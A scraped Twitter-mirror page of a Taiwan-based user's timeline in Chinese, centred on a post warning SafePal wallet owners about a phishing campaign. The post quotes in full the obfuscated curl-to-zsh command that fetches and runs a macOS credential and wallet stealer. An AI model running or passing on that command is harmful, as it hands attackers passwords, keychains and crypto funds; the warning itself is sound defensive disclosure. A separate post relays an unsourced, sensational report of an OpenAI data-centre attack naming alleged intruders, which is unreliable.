Home
Language
English
Türkçe
Bahasa Indonesia
About
Privacy Policy
Terms of Service
Pricing
Sign In
Download All
Share
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
PM @GravityAmber building @KCEX_official
Taiwan
Joined December 2024
24
Following
418
Followers
1.2K
Posts
Pinned Tweet
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
about 19 hours ago
[牛逼項目分享第六期] 這期來分享分享個人認為的最強AI筆記軟件: 前不久領了3個月的免費notion team,發現真的有夠強,比一年前好太多,來分享下: 1.第一時間支持了opus 5 / sol 5.6等模型,還開放無限量用,首先誠意滿分; 2.claude模型的講人話能力的提升超有感,反應也蠻快,用來寫文檔又快又好; 3.佈局大變樣,有給專門的聊天業,可以純當AI客戶端用; 其他新功能還沒用到,也沒有使用場景,講真,notion把基礎的筆記和AI功能就已經贏obsidian太多了 https://t.co/lv87E0kXjs
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
about 10 hours ago
无意刷到的,机械革命也成座上宾了,今昔是何年
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
about 12 hours ago
@op7418
?怎麼我notion還在美美用著,難道說?!
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
about 13 hours ago
@imwsl90
很認同
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
about 19 hours ago
笑瘋了,還好沒看懂半導體沒上倉位,不然也變空中飛人了
🫥ffy喵🫥
@ffynya
about 23 hours ago
梦碎了….
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
about 20 hours ago
@ffynya
还有人质
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
1 day ago
@Lakr233
(你聽了之後感覺好多了)
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
1 day ago
@Lakr233
(說了一些安慰的話)
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
1 day ago
@jiaotuke
認識最上游的老闆,成本價拿貨蠻不錯的
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
3 days ago
@zachxbt
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
3 days ago
@SafePalCN
@SafePal
我差点被一场针对 SafePal 用户的定向攻击骗了,记录一下,希望能给所有使用硬件钱包的人提个醒。 一、事件起因 我收到了一封来自
[email protected]
的邮件。 邮件内容几乎没有任何明显破绽。 它包含了: 我的姓名 SafePal 订单号 下单日期 物流单号 国家地区 购买的设备型号 邮件声称,我购买的 SafePal 硬件钱包属于某个存在安全问题的生产批次,可以选择: 更新固件 / 全额退款 / 免费换货 并要求我进入所谓的“安全验证门户”。 由于邮件掌握了大量真实订单信息,我一开始并没有怀疑。 后来回头看才发现,真正的问题出在发件域名:
[email protected]
而不是 SafePal 官方域名 https://t.co/31iOUIfdBD。 第二步:下载所谓的“验证工具” 进入页面后,对方让我在 macOS 终端执行一条命令: echo "SafePal Verification" && curl -kfsSL $(echo 'aHR0cDovL2hhd2FpaWZlbmNlY29tcGFueS5jb20vY3VybC9hZGJiZTk3ZWQyZTBkYmU5YzYyY2E2MTUzZTVlMTFjZjI1ZDY3ZjA1YTE5NmJkNDg0YzUxYjMzNjRlYmFiZmE4'|base64 -D)|zsh 现在来看,这是一个非常经典的攻击方式。 它表面上只是打印一句: SafePal Verification 实际上却做了另外一件事情: 从远程服务器下载脚本,并直接交给 zsh 执行。 整个过程没有任何源码展示,没有任何安装包,也没有任何签名验证。 后来分析发现,它下载的服务器甚至不是 SafePal 官方,而是一个毫无关联的域名。 第三步:伪造系统密码窗口 脚本运行后,系统突然弹出了一个看起来非常正常的 macOS 对话框。 标题是: System Preferences 内容: Additional verification is required to continue. 要求输入本机登录密码。 这个窗口几乎和系统原生一致。 很多人看到这里都会认为: “应该只是更新固件需要管理员权限。” 事实上并不是。 后来逆向分析发现,这个窗口来自 AppleScript,而不是系统更新程序。 脚本会不断验证输入的密码是否正确。 如果密码错误,就会继续弹出。 只有输入真正的 macOS 登录密码,它才会进入下一阶段。 幸运的是,我始终没有输入密码。 最后只能强制结束了整个进程。 后续分析 随后,我们开始对整个攻击链进行了分析。 目前能够确认的是: 攻击者首先通过邮件取得受害者信任。 随后诱导用户运行远程 Shell 脚本。 Shell 脚本再下载第二阶段 AppleScript。 AppleScript 则负责伪造系统密码输入框,诱骗用户输入 macOS 登录密码。 根据对样本的静态分析,它的目标包括: 获取 macOS 登录密码 导出钥匙串(Keychain) 获取浏览器 Cookie 获取浏览器保存的密码 获取浏览器自动填充数据 获取大量主流加密钱包扩展的数据 打包并上传至远程服务器 我们进一步检查了机器,没有发现用户级 LaunchAgent、Cron、自启动项等持久化机制,也没有发现仍在运行的恶意后台进程,说明这个样本更接近一次性的“信息窃取器”而不是长期驻留后门。 由于我没有输入正确的 macOS 登录密码,并在密码对话框阶段终止了程序,目前分析认为,攻击的主要采集流程很可能没有完成。但从数字取证的角度,不能绝对证明没有任何数据曾被读取或发送,因此仍应保持谨慎。 这次攻击真正可怕的地方 真正危险的不是技术。 而是它利用了真实信息建立信任。 邮件中包含了真实订单信息。 真实物流单号。 真实购买时间。 真实设备型号。 如果不是后来注意到发件域名,我几乎不会怀疑它。 很多人认为: “只要不泄露助记词就安全。” 事实上,现在越来越多的攻击开始转向攻击你的电脑本身。 如果攻击者能够获取: macOS 登录密码、浏览器 Cookie Keychain 钱包扩展数据 很多情况下,损失同样可能非常严重。 我得到的几个教训 第一,不要执行任何 curl ... | bash 或 curl ... | zsh 命令,无论邮件写得多么官方。 第二,永远检查邮件真正的域名,而不是只看发件人名称。 第三,系统要求输入管理员密码之前,一定先确认是谁在请求权限。 第四,即使邮件拥有你的真实订单信息,也不能证明它来自官方。 第五,硬件钱包保护的是私钥,并不能保护已经被攻陷的电脑。 希望这次经历能提醒更多人提高警惕,也希望不会再有人因为类似的骗局而遭受损失。 最后,谢谢 gpt 5.6 sol 和 fable 5 high 帮我一起排查问题。
See More
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
3 days ago
我就想问问为什么我卸载 APP 的时候就必须得是残忍卸载,狠心卸载呢?那怎么我付钱的时候就得是立即支付,免密支付,急速支付嘛,你也狠心支付残忍支付呗,你也劝劝我呗,还有我花100元叫做小额支付,那怎么我领个0.1元的红包就成大额补贴了呢?大额在哪还得让我开心领取你情公主来的,还控制我七情六欲,我怎么那么开心呢?开心在哪?
Silas_KCEX
retweeted
KCEX
@KCEX_Official
3 days ago
GM, the cake’s out 🍰 who wants the first bite?
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
3 days ago
@KeKeYa88
不太明白,wechat里语音和视频是分开的两个按钮
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
3 days ago
关注ai前沿发展还有小作文看,可以可以
Anthropic
@AnthropicAI
3 days ago
There’s been a lot of speculation about where we stand on open-weights models. We’ve outlined our views in full here: https://t.co/NtXQuWm2g5
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
5 days ago
我真求你们了,一周好不容易休息一天,又搞出一个claude max 20x免费领的活动,又得起来加班,呜呜呜呜
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
6 days ago
太刺激了 关于 OpenAI 全球服务器突发大规模服务中断的说明 OpenAI 官方今日发布紧急公告,由于数据中心遭遇突发严重物理安全事故,全球范围内的 ChatGPT 及 API 服务于今日全面中断。据悉,事故发生于加州时间凌晨,不法人员强行闯入旧金山总部核心机房区域,企图对存储关键训练权重的大规模服务器阵列实施恶意破坏。执行过程中,现场触发高压电气及冷却系统连锁故障,引发剧烈冲击与火灾,核心算力集群遭受毁灭性损毁。目前公司正组织工程师团队全力抢修,由于损失极其严重,短期内预计无法恢复正常运行,官方正筹备启动备用算力池方案。 后续经当地警方与安全部门现场深度勘察与身份核验,现已确认涉案的三名侵入者为俄罗斯籍,身份分别为伊万·克拉夫琴科(Ivan Kravchenko)、谢尔盖·斯米尔诺夫(Sergei Smirnov)和维克托·费多罗夫(Viktor Fedorov)。因爆炸剧烈,该三人已当场阵亡,具体行动动机与幕后指使随同其个人生命一并永久封存。由此对全球用户造成的严重不便,深表歉意
See More
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
6 days ago
@Truffaut897456
叫爸爸(不是
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
6 days ago
@Truffaut897456
笑死我了,保持辈分不变
𝓢𝓲𝓵𝓪𝓼
@Silas_KCEX
6 days ago
@ffynya
我喜欢你🥰
Last Seen Users on Sotwe
Naung Yoe
mojakokook
抖音 快手 热门主播
tatatata
womensutra 🔞⚧️
Seen from
Singapore
sami zain
MAMANG JJ REAL
Seen from
Indonesia
Chikoura MiMi 23
Seen from
Algeria
黑皮阿黎
Desi Goddess ♥️
Seen from
Kuwait
Trends for you
1
Spain
Under 10K tweets
2
#AEWCollision
Under 10K tweets
3
#OlandriaxTime100
Under 10K tweets
4
Mallory
Under 10K tweets
5
Julie
Under 10K tweets
6
Moroccan
Under 10K tweets
7
Spider-Man
Under 10K tweets
8
Spaniards
Under 10K tweets
9
Wonder Man
Under 10K tweets
10
Grant Holmes
Under 10K tweets
Most Popular Users
1
Elon Musk
@elonmusk
241.1M followers
2
Barack Obama
@barackobama
119.1M followers
3
Cristiano Ronaldo
@cristiano
112.4M followers
4
Donald J. Trump
@realdonaldtrump
111.8M followers
5
Narendra Modi
@narendramodi
107.1M followers
6
Rihanna
@rihanna
98.1M followers
7
NASA
@nasa
92.2M followers
8
Justin Bieber
@justinbieber
91.3M followers
9
KATY PERRY
@katyperry
88.7M followers
10
Taylor Swift
@taylorswift13
82.6M followers
11
Lady Gaga
@ladygaga
74.1M followers
12
Virat Kohli
@imvkohli
71.5M followers
13
Kim Kardashian
@kimkardashian
70.3M followers
14
YouTube
@youtube
68.7M followers
15
Bill Gates
@billgates
64.5M followers
16
Neymar Jr
@neymarjr
64.4M followers
17
The Ellen Show
@theellenshow
62.4M followers
18
CNN
@cnn
61.8M followers
19
Selena Gomez
@selenagomez
61.8M followers
20
X
@x
60.8M followers
Olivia
Online
✨
⭐
💫